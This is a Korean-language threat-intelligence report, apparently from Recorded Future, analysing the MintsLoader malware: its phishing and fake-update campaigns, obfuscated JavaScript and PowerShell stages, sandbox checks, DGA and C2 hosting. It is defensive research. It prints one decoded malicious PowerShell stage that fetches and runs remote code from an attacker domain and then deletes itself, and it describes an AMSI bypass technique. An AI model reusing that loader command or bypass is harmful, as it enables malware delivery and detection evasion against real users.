Recorded Future Malware Intelligence Hunting을 통해 MintsLoader 발견
Executive Summary
MintsLoader라는 악성 로더는 2024년 초에 여러 피싱 및 드라이브 바이 다운로드 캠페인에서 처음 발견되었습니다. 로더는 일반적으로 GhostWeaver, StealC, 수정된 BOINC(Berkeley Open Infrastructure for Network Computing) 클라이언트와 같은 2단계 페이로드를 배포합니다. MintsLoader는 난독화된 JavaScript 및 PowerShell 스크립트를 사용하는 다단계 감염 체인을 통해 작동합니다. 이 멀웨어는 샌드박스 및 가상 머신 회피 기법, 도메인 생성 알고리즘(DGA), HTTP 기반 명령 및 제어(C2) 통신을 사용합니다.
MintsLoader는 여러 위협 그룹에 의해 사용되는 것으로 관찰되었습니다. 그러나 TAG-124(일명 LandUpdate808)의 운영자들은 이를 광범위하게 사용했습니다. 로더는 산업, 법률, 에너지 부문을 대상으로 하는 피싱 이메일(TAG-124), 브라우저 업데이트 프롬프트를 사칭하는 손상된 웹사이트(SocGholish), 이탈리아의 PEC 인증 이메일 시스템을 통해 배포되는 송장 테마의 유인물 등 여러 감염 벡터를 통해 배포됩니다.
MintsLoader는 난독화를 사용하여 YARA 규칙과 같은 정적 감지를 복잡하게 만들고, DGA 기반 C2 인프라 사용은 최신 감시 목록이나 차단 목록을 유지하기 어렵게 하며, 분석 방지 기술은 샌드박스나 가상화를 이용하는 호스트 기반 감지를 복잡하게 만듭니다. 그러나 Recorded Future의 Malware Intelligence Hunting은 새로운 MintsLoader 샘플 및 관련 C2 도메인을 식별하고, 차단 목록 또는 위협 헌팅을 위한 최신 목록을 제공합니다.
MintsLoader는 난독화, 샌드박스 회피 및 적응형 인프라를 지속적으로 사용하여 멀웨어 생태계 내에서 계속 유지될 가능성이 높으며, 이로 인해 추가적인 위협 행위자에 의한 사용이 증가할 수 있습니다. 멀웨어가 다양한 전달 메커니즘으로 이용되는 것은 사이버 범죄 커뮤니티 내에서 점점 더 전문화되고 특화되고 있음을 반영합니다. 이러한 정교함의 증가로 보다 탄력적이고 효율적인 운영이 가능해져 위협 행위자에게 이점이 있지만, 동시에 방어자에게는 악의적인 활동을 보다 효과적으로 그리고 대규모로 식별하고 차단할 수 있는 기회를 제공할 수 있습니다.
주요 연구 결과
- MintsLoader의 2단계 PowerShell 스크립트는 샌드박스 및 가상 환경 회피 기술을 사용하여 자동화된 분석에 대한 취약성을 줄이고 동적 탐지 도구를 우회할 가능성을 높입니다.
- 시스템 날짜를 기준으로 일일 C2 도메인을 생성하기 위해 MintsLoader가 DGA를 사용하면 인프라 모니터링 활동과 도메인/IP 기반 탐지가 복잡해집니다.
- Recorded Future의 Malware Intelligence Hunting은 동적 인프라로 인해 추적하기 어려운 MintsLoader와 관련된 최신 C2 도메인 및 기타 아티팩트를 제공합니다.
- Insikt Group에 따르면 GhostWeaver는 관찰된 캠페인 전반에 걸쳐 MintsLoader에 의해 배포된 주요 페이로드입니다.
- GhostWeaver의 자체 서명된 X.509 인증서는 AsyncRAT 및 그 변종의 인증서와 유사하여 초기에는 AsyncRAT와 같은 다른 멀웨어 계열과 잘못 연결될 수 있습니다.
배경
Orange Cyberdefense는 2024년 7월에서 10월 사이에 광범위한 배포 캠페인에서 MintsLoader를 처음 감지했습니다. Insikt Group은 2024년 2월 Palo Alto Unit42의 SocGholish 감염 분석을 기반으로 초기 캠페인을 식별했습니다.
로더는 여러 DGA 기반 도메인에서 가져온 JavaScript(1단계) 및 PowerShell(2단계) 스크립트로 구성됩니다. "MintsLoader"라는 이름은 URL 매개 변수 s=mints[NUMBER](예: s=mints11)의 독특한 사용에서 유래되었습니다. MintsLoader는 일반적으로 GhostWeaver, StealC, Berkeley Open Infrastructure for Network Computing(BOINC) 클라이언트와 같은 보조 페이로드를 제공하는 캠페인에서 관찰됩니다.
그림 1: MintsLoader 프로필 (출처: Recorded Future)
MintsLoader는 여러 위협 행위자에 의해 사용되는 것으로 여겨지지만, TAG-124(LandUpdate808이라고도 함) 감염에서 MintsLoader를 배포하는 것이 자주 관찰되었습니다. 또한 SocGholish를 사용하는 위협 행위자는 MintsLoader의 초기 사용자였으며, 그 결과 MintsLoader 캠페인은 초기 평가에서 SocGholish와 독점적으로 연관된 것으로 평가되었습니다. 일례로, 2024년 2월 Palo Alto의 Unit42는 SocGholish와 연관된 지표를 발표했습니다(그림 2). 그러나 Insikt Group의 분석에 따르면 AsyncRAT를 제공하는 것으로 식별된 URL은 알려진 MintsLoader URL 패턴과도 일치합니다.
그림 2: Palo Alto SocGholish 감염 IoCs(출처: Recorded Future)
마찬가지로 2024년 7월, Huntress Labs는 BOINC 클라이언트를 전달하는 SocGholish 감염을 보고했습니다. 특히 BOINC를 다운로드하는 데 사용된 URL은 알려진 MintsLoader URL 패턴과 일치합니다. 그림 3은 MintsLoader를 사용하는 위협 행위자에 대한 대략적인 개요를 보여줍니다.
그림 3: 위협 행위자의 MintsLoader 사용(출처: Recorded Future)
아래는 최근 보고된 MintsLoader 관련 캠페인입니다.
MintsLoader 및 Kongtuke/ClickFix 페이지
2025년 초, 보안 분석가들은 MintsLoader를 초기 로더로 전달하는 피싱 캠페인을 관찰했습니다. 피싱 이메일(미국과 유럽의 에너지, 석유 및 가스, 법률 부문 겨냥)에는 악성 JavaScript 첨부 파일 또는 "확인을 위해 클릭"하는 가짜 웹 페이지 링크가 포함되어 있었습니다. 그림 4에 ClickFix 페이지의 예가 나와 있습니다.
그림 4: ClickFix 페이지 예시(출처: https://www.hhs.gov/)
두 경우 모두 피해자 컴퓨터에서 MintsLoader의 PowerShell 기반 2단계가 실행되었습니다. 이 로더는 최종 페이로드를 다운로드했으며, 특히 StealC 인포스틸러와 수정된 BOINC 클라이언트 빌드를 포함합니다. 이 캠페인은 가짜 CAPTCHA 확인 페이지(ClickFix/KongTuke 유인책)를 활용하여 사용자가 복사된 PowerShell 명령을 실행하도록 속임으로써 MintsLoader를 다운로드하고 실행합니다(그림 5).
그림 5: MintsLoader ClickFix 감염 체인 (출처: Recorded Future)
이 캠페인의 다른 감염 체인은 다운로드된 'Fattura########.js' 파일(이탈리아어로 "송장")을 통해 MintsLoader를 전달했습니다. 피해자가 이 파일을 열면 동일한 PowerShell 로더 실행으로 이어집니다. eSentire의 Threat Response Unit 연구원들은 이 캠페인을 보고하고, 위협 행위자들이 북미와 유럽 전역의 산업 및 전문 서비스 분야를 목표로 하고 있음을 지적했습니다.
SocGholish "FakeUpdates" 캠페인
여러 보고서에 따르면(1, 2) SocGholish(FakeUpdates) 위협 행위자는 MintsLoader를 운영에 통합했습니다. 2024년 7월경부터 손상된 웹사이트를 통한 SocGholish 감염에서 MintsLoader를 통해 BOINC 분산 컴퓨팅 클라이언트를 설치하는 감염 체인이 나타났습니다.
그림 6에 표시된 이 드라이브 바이 캠페인에서, 합법적이지만 손상된 사이트를 탐색하는 피해자들은 가짜 브라우저 업데이트 프롬프트(주로 update.js 스크립트에서 유래)를 접하게 됩니다. 이를 실행할 경우, 악성 JavaScript는 난독화된 MintsLoader 페이로드를 가져와 다단계 PowerShell 시퀀스를 시작합니다.
그림 6: MintsLoader 가짜 업데이트 예시(출처: TRAC Labs)
Huntress Labs는 두 가지 병렬 결과를 문서화했습니다. 한 경로는 메모리에서 파일리스 AsyncRAT가 실행되는 결과를 낳았고, 다른 경로는 공격자의 통제 하에 스텔스 BOINC 설치로 이어졌습니다. BOINC 배포는 표준 BOINC 서버가 아닌 악성 C2에 연결하도록 수정 및 구성되었습니다.
어떤 경우에는 GhostWeaver PowerShell 백도어(Mandiant가 UNC4108로 추적함)도 MintsLoader를 통해 전달되었습니다. 이는 공격자에게 지속적인 기반과 추가 플러그인을 로드할 수 있는 플랫폼을 제공합니다.
유럽의 송장 피싱
2024년 말에 진행된 또 다른 MintsLoader 캠페인은 송장 테마의 피싱 이메일을 통해 유럽 조직을 표적으로 삼았습니다. 그 예가 그림 7에 나와 있습니다. 스팸 메시지가 이탈리아의 PEC(인증 이메일) 시스템을 활용하여 합법적인 메일로 속이고 수신자가 송장으로 가장한 JavaScript 첨부 파일을 열도록 유인했습니다. Spamhaus 연구팀은 이를 "PEC 송장 사기"라고 명명하고, 공격자들이 신뢰할 수 있는 이메일 채널을 악용하여 보안 검사를 우회하는 방법을 소개했습니다. 이 캠페인은 "기업의 시간, 돈, 신뢰를 훔쳤다"는 평가를 받았습니다.
그림 7: PEC 피싱 이메일(출처: Spamhaus)
기술 분석
MintsLoader는 JavaScript와 PowerShell을 포함하는 다단계 실행 체인을 사용합니다. 각 단계는 분석을 방해하기 위해 난독화를 사용합니다. MintsLoader는 보조 기능 없이 로더로만 작동하지만, 주요 강점은 샌드박스 및 가상 머신 회피 기술, 그리고 실행 날짜에 따라 C2 도메인을 파생시키는 DGA 구현에 있습니다. 이러한 기능은 정적 분석과 호스트 기반 탐지를 상당히 복잡하게 만듭니다. 그러나 C2 통신은 HTTP를 통해 이루어져서, 새 샘플을 탐지하고 식별하는 데 신뢰할 수 있는 벡터를 제공합니다. 그림 8은 MintsLoader의 주요 기능을 소개합니다.
그림 8: MintsLoader의 고급 기능 (출처: Recorded Future)
MintsLoader에 대한 이 분석에는 1단계 및 2단계 페이로드와 MintsLoader 인프라에 대한 세부 정보가 포함되어 있습니다.
MintsLoader 공격 체인
MintsLoader는 일반적으로 KongTuke 또는 ClickFix 페이지 링크가 포함된 피싱 이메일을 통해 전달됩니다. 이 페이지가 실행되면 JavaScript의 첫 번째 단계를 가져와 실행합니다. JavaScript는 심하게 난독화되어 있으며, 실행 시 그림 9에 표시된 대로 MintsLoader의 두 번째 단계를 다운로드하고 실행하기 위해 PowerShell 명령을 실행합니다.
그림 9 : MintsLoader 감염의 첫 번째 단계(출처: Recorded Future Malware Intelligence)
두 번째 단계에서는 환경 검사를 수행하여 샌드박스와 가상화 환경 중 어디에서 실행 중인지 확인합니다. 다음으로, 스크립트는 DGA를 사용하여 다음 C2 도메인을 생성합니다. 그런 다음 MintsLoader는 생성된 도메인에 연결하여 GhostWeaver, StealC 또는 BOINC 클라이언트와 같은 최종 페이로드를 다운로드하려고 시도합니다. 그림 10은 이 공격 체인의 대략적인 개요를 보여줍니다.
그림 10: 일반적인 MintsLoader 감염 체인 (출처: Recorded Future)
1단계: JavaScript
MintsLoader의 초기 단계는 두 번째 단계를 검색하기 위해 PowerShell 명령을 실행하는 JavaScript 파일로 구성됩니다. 스크립트는 정크 주석, 읽을 수 없는 변수 및 함수 이름, 문자 대체, 문자열 인코딩을 사용하여 심하게 난독화되어 있습니다 (그림 11). Insikt Group은 Recorded Future Malware Intelligence Hunting에서 파생된 데이터를 사용하여 141개의 MintsLoader 1단계 샘플을 발견했습니다 (부록 A).
그림 11: MintsLoader 1단계 난독화된 JavaScript(출처: Recorded Future)
1단계 JavaScript 페이로드의 핵심 기능은 ‘curl -useb http://[domain]/1.php?s=[campaign]’ 명령을 실행하는 PowerShell 명령을 실행하여 두 번째 단계를 다운로드하고 실행하는 것입니다. PowerShell에서 ‘curl’을 ‘-useb’ 옵션과 함께 사용할 경우 이는 Invoke-WebRequest의 별칭으로 작동하며, cURL 프로그램은 실제로 HTTP 요청을 수행하는 데 사용되지 않습니다.
Insikt Group은 1단계 로더의 세 가지 버전을 식별했으며, 모두 동일한 JavaScript 난독화 기술을 사용하지만 배포된 PowerShell의 구현 방식에는 차이가 있습니다.
첫 번째 변형은 그림 12에 표시된 대로 C2 도메인이 하드코딩된 상태에서 평문으로 PowerShell 명령을 실행합니다. 이 변형은 "mints13" 및 "flibabc11" 캠페인에서 관찰됩니다.
그림 12: 평문 1단계 PowerShell 명령(출처: Recorded Future Malware Intelligence)
두 번째 변형에서는 문자 대체를 사용하여 PowerShell 명령이 난독화됩니다. C2 도메인은 여전히 하드코딩되어 있으며 curl 명령의 별칭이 대신 사용되지만, 목표는 여전히 다음 단계를 다운로드하는 것입니다(그림 13). 캠페인 전반에 걸쳐 가장 널리 사용되는 변형은 "flibabc21", "flibabc22", "mints11", "mints13", "mints21" 및 "mints42"입니다.
그림 13: 평문 1단계 난독화된 PowerShell 명령(출처: Recorded Future Malware Intelligence)
세 번째 변형은 명령을 Base64로 인코딩합니다(그림 14). Insikt Group은 이전 캠페인 “mints13”에서 이 방법이 사용된 것을 확인했습니다.
그림 14: Base64로 인코딩된 1단계 PowerShell 명령(출처: Recorded Future Malware Intelligence)
그러나 이 버전에서는 PowerShell 명령이 cURL을 통해 두 번째 단계를 다운로드하기 위한 PowerShell 명령을 포함하는 파일을 생성합니다. 그 후 파일을 실행하고 삭제합니다.
|
$ErrorActionPreference = "Continue" $randomNamePart1 = -join ((48..57) + (97..122) | Get-Random -Count 5 | % { [char]$_ }); $currentTimeHour = [int](Get-Date -Format HH); $currentTimeMinute = [int](Get-Date -Format mm); $minuteAdjustment = 3; If ($currentTimeMinute + $minuteAdjustment -gt 59) { $currentTimeHour = $currentTimeHour + 1; $currentTimeMinute = $currentTimeMinute + $minuteAdjustment - 60; } Else { $currentTimeMinute = $currentTimeMinute + $minuteAdjustment; }; $currentTimeHour = If (([int](Get-Date -Format HH) + 1) -gt 23) { "00" } Else { $currentTimeHour }; $randomNamePart2 = -join ((65..90) + (97..122) | Get-Random -Count 12 | % { [char]$_ }); $scriptToExecute = @" $ErrorActionPreference = "Continue" curl -useb "http://gibuzuy37v2v[.]top/1.php?s=mints13" | iex; Remove-Item "C:\Users\Public\Documents\$($randomNamePart2).ps1" -Force "@; "powershell -noprofile -executionpolicy bypass -WindowStyle hidden -c $($scriptToExecute)" | Out-File -FilePath "C:\Users\Public\Documents\$($randomNamePart2).ps1"; powershell -noprofile -executionpolicy bypass -WindowStyle hidden -File "C:\Users\Public\Documents\$($randomNamePart2).ps1"; Remove-Item "$env:APPDATA\*.ps1" -Force Remove-Item "$env:APPDATA\*.bat" -Force |
표 1: base64로 인코딩된 1단계 PowerShell 명령의 디코딩(출처: Recorded Future)
1단계 C2 통신
어떤 변형을 실행하더라도 하드코딩된 도메인으로 2단계 페이로드를 검색하기 위한 HTTP GET 요청이 발생합니다. 요청이 성공하면 그림 15에 표시된 PowerShell 스크립트를 검색하고 실행합니다.
그림 15: C2에서 2단계 검색 성공(출처: Recorded Future)
DGA 도메인이 더 이상 유효하지 않으면 그림 16에 표시된 대로 302 응답이 반환됩니다.
그림 16: C2에서 2단계 검색 실패(출처: Recorded Future)
2단계 PowerShell
두 번째 단계인 PowerShell에는 Base64로 인코딩된 문자열이 포함되어 있습니다. XOR 디코딩 및 압축 해제 후, 난독화된 기본 페이로드가 생성됩니다. 그림 17은 이 페이로드의 일부를 보여주며, MintsLoader의 난독화된 문자열 구성 기법을 설명합니다.
그림 17: 2단계 PowerShell 난독화(출처: Recorded Future)
초기 난독화 해제 및 디코딩 후, PowerShell의 두 번째 단계는 알려진 기법으로 AMSI 초기화 실패를 가장하여 멀웨어 방지 검사 인터페이스(AMSI)를 우회하려는 시도로 시작합니다. 즉, System.Management.Automation.AmsiUtils 객체의 amsiInitFailed 변수를 TRUE로 설정하는 것입니다.
나머지 코드는 시스템이 베어메탈, 샌드박스, 가상 머신 중 어디에서 실행 중인지 감지하기 위해 논리 표현식에서 사용되는 반환 값을 제공하는 세 가지 시스템 정보 쿼리를 실행합니다. 이것은 URL 매개 변수 key로 전송된 정수 변수를 통해 C2에 전달되며, C2는 해당 값을 검사하여 응답이 최종 페이로드를 다운로드하는 세 번째 단계를 반환할지, 아니면 미끼를 반환할지 결정합니다. 유의할 점은 키 변수를 증가시키는 데 사용되는 일정한 정수 값이 2단계 샘플마다 변한다는 것입니다.
각 시스템 정보 쿼리의 결과는 샘플마다 순서가 달라지는 세 가지 논리 표현식과 키를 증가시키는 상수에 대해 확인되며, 이 결과는 키 변수 값에 영향을 미칩니다. 논리적 표현은 초기 검사 시 명확한 결과를 제공하지 않을 수 있습니다. 예를 들어, 아래 그림 18에 표시된 첫 번째 난독화 해제 시스템 검사가 가상 머신에서 실행된다면, $isVirtualMachine 변수는 $true와 같을 것입니다. 논리 표현식 "$true -eq 3"은 PowerShell에서 $true로 평가되어 83670406277 대신 15310805757만큼 키를 증가시킵니다.
그림 18: 2단계 PowerShell 가상 머신 검사(출처: Recorded Future)
두 번째 시스템 검사는 그림 19와 같이, Win32_VideoController WMI 객체의 AdapterDACType 멤버를 쿼리하여 디지털-아날로그 변환기(DAC) 칩의 이름 또는 식별자를 가져옵니다. 이것은 감염된 시스템이 에뮬레이터에서 실행 중인지 아니면 가상 환경에서 실행 중인지 결정합니다. 일반적으로 Windows 시스템은 "Internal" 및/또는 "Integrated RAMDAC"을 반환하며, 이 예에서는 키가 14467965888만큼 증가합니다.
그림 19: 2단계 PowerShell 비디오 컨트롤러 검사(출처: Recorded Future)
세 번째 시스템 검사는 Win32_CacheMemory WMI 객체의 purpose 멤버를 쿼리하며, 일반적인 Windows 시스템에서는 "L1 Cache"와 같습니다. 명확하지 않은 논리 표현 "$l1CachePurpose.length —gt 4"는 최적의 경우에 실행되며, 그림 20의 난독화 해제된 예제에서 키 값을 27424330481만큼 증가시킵니다.
그림 20: 2단계 PowerShell 메모리 검사(출처: Recorded Future)
시스템의 키 검사 및 계산 후, 날짜와 상수를 기반으로 임의의 시드를 생성합니다. 이 시드는 system.Random 객체와 함께 사용되어 그림 21과 같이 간단한 DGA와 URL 경로로 도메인을 구성합니다. 작성자가 URL 경로를 구성할 때 두 번째 무작위 변수를 사용하지 않는 실수를 범한 것으로 보입니다. 대신 URL 경로 끝에 정의되지 않은 변수를 사용하여 URL 경로 끝이 "htr.php"로 고정되었습니다. PowerShell에서 curl은 Invoke-WebRequest의 별칭입니다. 이는 세 번째 단계에서 C2에 대한 요청을 생성하는 데 사용되므로, User-Agent HTTP 헤더에는 curl이 아닌 PowerShell 버전 정보가 포함됩니다.
그림 21: 2단계 PowerShell 최종 페이로드 검색(출처: Recorded Future)
2단계 C2 통신
그림 22는 URL 경로가 htr.php로 끝나는 최종 페이로드에 대한 MintsLoader 요청의 예를 보여줍니다. URL 매개변수 id는 호스트 이름이며, URL 매개변수 s는 캠페인 ID입니다.
그림 22: 최근의 2단계 C2 GET 요청(출처: Recorded Future)
그림 23에는 세 번째 단계에 대한 이전 MintsLoader 요청의 예가 나와 있습니다. URL 경로가 무작위가 아닌 고정된 문자열 "2.php"로 되어 있습니다.
그림 23: 이전의 2단계 C2 GET 요청(출처: Recorded Future)
2단계 요청이 특정 요구 사항을 충족하지 못하면, 이 예시처럼 최종 페이로드가 미끼 실행 파일(그림 24)로 이어져 temp [.] sh 사이트에서 AsyncRAT 미끼 실행 파일이 다운로드될 수 있습니다. AsyncRAT과의 연관성으로 인해 보고서의 초기 명칭과 네트워크 트래픽에 대한 일부 대응책이 "AsyncRAT Loader"로 지정되었습니다. 이로 인해 현재 MintsLoader 캠페인이 AsyncRAT을 배포하지 않음에도 불구하고 MintsLoader 멀웨어 샘플이 AsyncRAT으로 잘못 태그됩니다.
그림 24: 3단계 미끼 대응(출처: Recorded Future)
그림 25에는 최근 있었던 성공적인 시도가 나와 있습니다. 이 예에서 최종 페이로드는 GhostWeaver입니다.
그림 25 : MintsLoader GhostWeaver 페이로드(출처: Recorded Future)
GhostWeaver
MintsLoader가 배포한 가장 일반적인 페이로드 중 하나는 GhostWeaver입니다. 이는 MintsLoader와 코드 유사성 및 기능적 중복이 있는 PowerShell 기반 원격 액세스 트로이 목마(RAT)입니다. 특히 GhostWeaver는 sendPlugin 명령을 통해 MintsLoader를 추가 페이로드로 배포할 수 있습니다. GhostWeaver와 명령 및 제어(C2) 서버 간의 통신은 TLS 암호화를 통해 보호됩니다. 이를 위해 PowerShell 스크립트 내에 직접 포함된 난독화된 자체 서명 X.509 인증서가 C2 인프라에 대한 클라이언트 측 인증에 활용됩니다.
GhostWeaver는 때때로 AsyncRAT로 오분류되었습니다. Insikt Group은 Palo Alto Networks가 처음에 GhostWeaver 샘플(SHA256: fb0238b388d9448a6b36aca4e6a9e4fbcbac3afc239cb70251778d40351b5765)을 파일리스 AsyncRAT 변형으로 식별한 데서 이 오분류가 비롯되었다고 어느 정도 확신합니다. GhostWeaver와 AsyncRAT는 자체 서명된 X.509 인증서에서 동일한 만료 날짜와 일련 번호 길이와 같은 특정 특성을 공유합니다. 그러나 이러한 유사성은 의미 있는 운영 중복보다는 단순히 일반적인 인증서 생성 방법으로 인한 것일 수 있습니다.
MintsLoader 인프라
Insikt Group은 처음에 MintsLoader C2 서버가 BLNWX에서만 호스팅되는 것을 발견했지만, 이후 Stark Industries Solutions Ltd(AS44477), GWY IT Pty Ltd(AS199959), SCALAXY-AS(58061) 등 다른 ISP의 사용이 증가하는 것을 관찰했습니다. SCALAXY-AS를 통해 발표된 MintsLoader C2 IP 주소는 호스팅 제공업체 3NT Solutions LLP와 IROKO Networks Corporation에 의해 운영되며, 두 업체 모두 러시아어를 사용하는 불법 활동 방조 호스팅 업체 Inferno Solutions(inferno[.]name) 산하입니다. SCALAXY-AS 및 Stark Industries Solutions로의 전환은 MintsLoader 운영자가 익명의 가상 사설 서버(VPS) 제공업체에 의존하던 것에서 벗어나 전통적인 불법 활동 방조 호스팅 업체로 전환한 것을 나타내며, 폐쇄 시도에 대비하여 인프라를 강화하고 운영 안정성을 높이기 위한 노력의 일환으로 보입니다.
지난 몇 달 동안 Insikt Group은 의심되는 추가 캠페인 ID와 페이로드를 식별했습니다(표 2). 이 데이터는 공개 연구와 Insikt Group의 내부 연구에서 수집되었습니다.
캠페인 ID |
관찰된 최종 페이로드 |
마지막 활동 날짜 |
참고 |
521 |
Stealc |
2025-04-20 |
|
522 |
Stealc |
2025-04-20 |
|
523 |
Stealc |
2025-04-20 |
AsyncRAT 감염과 관련하여 관찰되었습니다. |
524 |
Stealc |
2025-04-20 |
N/A |
527 |
GhostWeaver |
2025-04-20 |
Insikt Group에 의해 TAG-124에 연결됨 |
flibabc11 |
GhostWeaver |
2025-04-20 |
|
flibabc12 |
GhostWeaver |
2025-04-20 |
|
flibabc13 |
GhostWeaver |
2025-04-20 |
|
flibabc14 |
Stealc |
2025-04-20 |
|
flibabc21 |
GhostWeaver |
2025-04-20 |
|
flibabc22 |
GhostWeaver |
2025-04-20 |
|
flibabc23 |
GhostWeaver |
2025-04-20 |
|
flibabc25 |
GhostWeaver |
2025-04-20 |
|
515 |
N/A |
N/A |
AsyncRAT 감염과 관련하여 관찰되었습니다. |
578 |
N/A |
N/A |
sesraw[.]com 도메인을 통해 TAG-124에 연결되며, 이 도메인은 Insikt Group이 이전에 TAG-124와 연결된 것을 확인한 바 있습니다. |
579 |
N/A |
N/A |
AsyncRAT 감염과 관련하여 관찰되었습니다. |
boicn |
N/A |
N/A |
AsyncRAT 감염과 관련하여 관찰되었습니다. |
mints1 |
N/A |
N/A |
N/A |
mints11 |
N/A |
N/A |
N/A |
mints12 |
N/A |
N/A |
N/A |
mints13 |
N/A |
N/A |
N/A |
mints21 |
N/A |
N/A |
N/A |
관련